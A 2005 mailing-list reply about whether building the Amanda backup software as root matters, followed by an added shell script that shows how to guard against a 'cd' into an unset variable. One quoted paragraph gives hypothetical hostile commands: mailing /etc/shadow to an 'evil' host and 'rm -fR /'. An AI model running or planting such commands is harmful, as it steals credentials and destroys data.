On Fri, Jan 21, 2005 at 06:15:28PM -0600, Frank Smith wrote:
>
>
> --On Friday, January 21, 2005 18:18:52 -0500 Eric Siegerman <erics AT
> telepres DOT com> wrote:
>
> > On Thu, Jan 20, 2005 at 10:22:16PM +0100, Stefan G. Weichinger wrote:
> >> - configure and make as $AMANDAUSER
> >
> > I don't believe this is necessary. One should avoid building
> > Amanda as root, but that's not because it'll cause problems for
> > Amanda; it's for the same reason one should avoid building
> > *anything* as root.
>
> Sorry for hijacking a thread, but playing devil's advocate here,
> what difference does it really make whether you build as root
> or not if you run 'make install' as root? How many people
> actually go through each line of the makefile, or run make -n
> first and examine all that, plus look through the code itself?
> In Amanda's case, for example, if the source for runtar
> contained code to 'mailx hax0r AT evil DOT com < /etc/shadow' or
> 'rm -fR /' would it really make any difference what user it
> was compiled under? Would they notice even if it wasn't buried
> in the source, but was just part of the 'install' target in
> the makefile (or an included subdirectory makefile)?
> For user programs, compiling and installing as a user
> can limit the damage that can be done, but if any part of
> the build, install, or execution ever has root privileges
> then you really aren't increasing your security by building
> as a normal user and installing as root.
> All that said, I generally do build as a normal user, as
> it can expose permission problems on libraries, paths, etc.
> at build time instead of later when users are trying to run
> the program.
You have said it yourself: as an ordinary user you limit the
possible problems. Have you never looked at a file with
an editor and inadvertently modified it? Don't you ever
do little changes to the code or makefiles? How about
running your builds from a script as Gene H. does. Or
running my configure with a script that modifies the makefiles
to allow me a target of *.i output files (post-preprocessor).
I don't want to run these things as root. There doesn't have
to be anything malicious to be dangerous or unwanted. Just a
simple error that might cause less damage run by amanda than
run by root. Or even by user jon. Suppose I had a simple "cd"
in one of these scripts; like
cd $AmandaBuildDir
But I forgot to properly set AmandaBuildDir, or I misspelled it
in the script. Now it is a "cd <with no args>" meaning a cd to
the home directory of the person running it. I would rather it
went to amanda's, not jon's and certainly not root's home dir
before continuing the script.
jl
--
Jon H. LaBadie jon AT jgcomp DOT com
JG Computing
4455 Province Line Road (609) 252-0159
Princeton, NJ 08540-4322 (609) 683-7220 (fax)
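Added example, not code from the thread or from Amanda: a small POSIX sh script that reproduces the hazard Jon describes (a "cd $AmandaBuildDir" whose variable was never set collapses to a bare "cd" into the home directory of whoever runs the script) and shows two guards that turn the silent misdirection into a loud failure. The variable name AmandaBuildDir comes from the thread; the function names and directories are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the mailing-list thread). Demonstrates the
# "cd with an unset variable" pitfall and two defensive forms.
# AmandaBuildDir is the name used in the thread; the rest is constructed.

# Unsafe form. With AmandaBuildDir unset or empty the unquoted expansion
# vanishes and the shell runs plain "cd", i.e. "cd $HOME" for whoever is
# running the script (root's home, if the build script was started as root).
unsafe_cd() {
    ( cd $AmandaBuildDir && pwd )
}

# Guard 1: the ${var:?message} form makes an unset or empty variable a
# fatal error with a non-zero exit status instead of a silent trip to $HOME.
guarded_cd() {
    ( cd "${AmandaBuildDir:?AmandaBuildDir is not set}" && pwd ) 2>/dev/null
}

# Guard 2: validate the target before changing into it and fail loudly.
# Quoting the expansion also keeps a path containing spaces from splitting.
checked_cd() {
    dir=$1
    if [ -z "$dir" ] || [ ! -d "$dir" ]; then
        echo "refusing to cd: '$dir' is not a directory" >&2
        return 1
    fi
    ( cd "$dir" && pwd )
}

# Short demonstration with the variable deliberately left unset.
demo() {
    unset AmandaBuildDir
    echo "unsafe_cd silently ended up in: $(unsafe_cd)"
    guarded_cd >/dev/null || echo "guarded_cd refused (exit status $?)"
    checked_cd "$AmandaBuildDir" >/dev/null 2>&1 || echo "checked_cd refused"
}

demo
```

Running the script as-is prints the home directory of the invoking user for the unsafe form and a refusal for both guarded forms; the same effect can be had script-wide with "set -u", which makes any reference to an unset variable an error.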